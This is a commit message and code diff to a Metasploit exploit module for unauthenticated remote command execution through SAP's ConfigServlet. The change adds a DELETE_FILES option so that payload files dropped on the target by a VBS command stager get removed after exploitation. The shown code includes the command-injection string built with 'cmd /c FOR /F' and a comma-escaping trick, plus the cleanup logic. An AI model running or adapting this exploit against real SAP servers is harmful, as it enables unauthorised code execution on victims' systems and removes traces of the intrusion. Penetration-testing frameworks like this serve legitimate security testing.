implement cleanup functionality

register DELETE_FILES advanced option to take control of the cleanup
functionality of CmdStagerVBS and FileDropper, implement the necessary
changes

modules/exploits/windows/http/sap_configservlet_exec_noauth.rb

@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::CmdStagerVBS
+	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -52,6 +53,11 @@ class Metasploit3 < Msf::Exploit
 				Opt::RPORT(50000),
 				OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
 			], self.class)
+
+		register_advanced_options(
+			[
+				OptBool.new('DELETE_FILES', [ true, 'Delete the dropped files after exploitation', true ])
+			], self.class)
 	end
 
 	def check
@@ -70,7 +76,7 @@ class Metasploit3 < Msf::Exploit
 		print_status("#{rhost}:#{rport} - Exploiting remote system")
 		uri = normalize_uri(target_uri.path, 'ConfigServlet')
 
-		execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
+		execute_cmdstager( { :linemax => 1500, :nodelete => !datastore['DELETE_FILES'], :sap_configservlet_uri => uri })
 	end
 
 	def execute_command(cmd, opts)
@@ -82,6 +88,12 @@ class Metasploit3 < Msf::Exploit
 				# using the following command line trick it is possible to echo commas into the right places
 				command.gsub!(",", "%i")
 				command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1 127.0.0.1| findstr )\"\`) DO " + command
+				if command.include?("shell.run")
+					if datastore['DELETE_FILES']
+						command.match /.*shell\.run \"(.*)\".*/
+						register_file_for_cleanup($1)
+					end
+				end
 			else
 				command = "cmd /c " + command
 			end